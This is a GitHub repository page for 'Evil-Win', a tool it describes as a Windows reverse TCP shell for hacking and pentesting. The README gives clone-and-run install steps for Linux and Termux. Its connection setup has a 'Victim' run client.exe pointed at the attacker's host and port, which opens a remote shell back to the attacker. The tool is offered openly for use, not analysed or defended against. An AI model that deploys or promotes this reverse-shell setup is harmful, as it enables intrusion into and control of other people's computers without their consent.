Skip to content

Windows Reverse TCP Shell for Hacking and Pentesting

Notifications You must be signed in to change notification settings

i-am-unbekannt/Evil-Win

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Evil Win

Windows Reverse TCP Shell for Hacking and Pentesting

Main Window

Installation:

  • Linux:

    • sudo apt update -y
    • sudo apt install python3 python3-pip git -y
    • git clone https://github.com/i-am-unbekannt/Evil-Win
    • cd Evil-Win/
    • pip3 install -r requirements.txt
    • python3 Evil-Win.py
  • Termux:

    • pkg update -y
    • pkg install python3 python3-pip git -y
    • git clone https://github.com/i-am-unbekannt/Evil-Win
    • cd Evil-Win/
    • pip3 install -r requirements.txt
    • python3 Evil-Win.py

Set Up A Connection

  • Host: python3 Evil-win.py [HOST] [PORT]
  • Victim: client.exe [HOST] [PORT]

Releases

No releases published

Packages

No packages published

Languages